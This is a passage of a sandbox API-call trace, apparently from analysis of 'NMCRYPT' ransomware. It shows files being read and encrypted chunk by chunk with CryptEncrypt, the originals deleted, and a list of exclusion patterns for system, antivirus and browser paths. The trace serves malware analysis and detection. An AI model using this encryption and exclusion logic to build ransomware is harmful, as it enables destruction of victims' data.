lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.013] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.013] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.013] GetLastError () returned 0x0 [0153.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.013] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.013] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.013] GetLastError () returned 0x0 [0153.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.013] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.013] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.013] GetLastError () returned 0x0 [0153.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.013] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.013] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0153.013] GetLastError () returned 0x0 [0153.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0153.013] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0153.013] CryptEncrypt (in: hKey=0x9ad8b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0153.013] GetLastError () returned 0x0 [0153.013] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0153.014] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0153.014] WriteFile (in: hFile=0x588, lpBuffer=0x29012e0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0153.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui")) returned 0x20 [0153.014] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui", dwFileAttributes=0x20) returned 0 [0153.014] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned 1 [0153.014] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui")) returned 0 [0153.014] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" [0153.014] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US") returned 1 [0153.014] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC8C2.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc8c2.tmp")) returned 0xc8c2 [0153.015] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC8C2.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc8c2.tmp"), dwFlags=0x1) returned 0 [0153.015] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\.xXC8C2.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\.xxc8c2.tmp")) returned 1 [0153.016] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0153.016] wcslen (_String="OK") returned 0x2 [0153.016] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.016] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0153.016] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0153.016] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0153.016] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0153.016] FindNextFileW (in: hFindFile=0x9ad438, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*NMCRYPT") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*Recovers your files.html") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*.exe") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*.dll") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*.lnk") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*.bat") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*.ini") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*.msi") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*.scf") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*pagefile.sys*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*NTUSER.DAT*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*AppData*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\winrar\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\java\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\windows\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\ESET\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\AVG\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\AVIRA\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*Atheros*") returned 0 [0153.016] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*Realtek*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*bootmgr*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*boot*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*boot*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*CONFIG.SYS*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*IO.SYS*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*MSDOS.SYS*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*NTDETECT.COM*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*ntldr*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*chrome*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*opera*") returned 0 [0153.017] PathMatchSpecW (pszFile="ShapeCollector.exe.mui", pszSpec="*firefox*") returned 0 [0153.017] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\ShapeCollector.exe.mui", pszSpec="*") returned 1 [0153.017] strlen (_Str="NMoreira") returned 0x8 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.017] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0153.019] 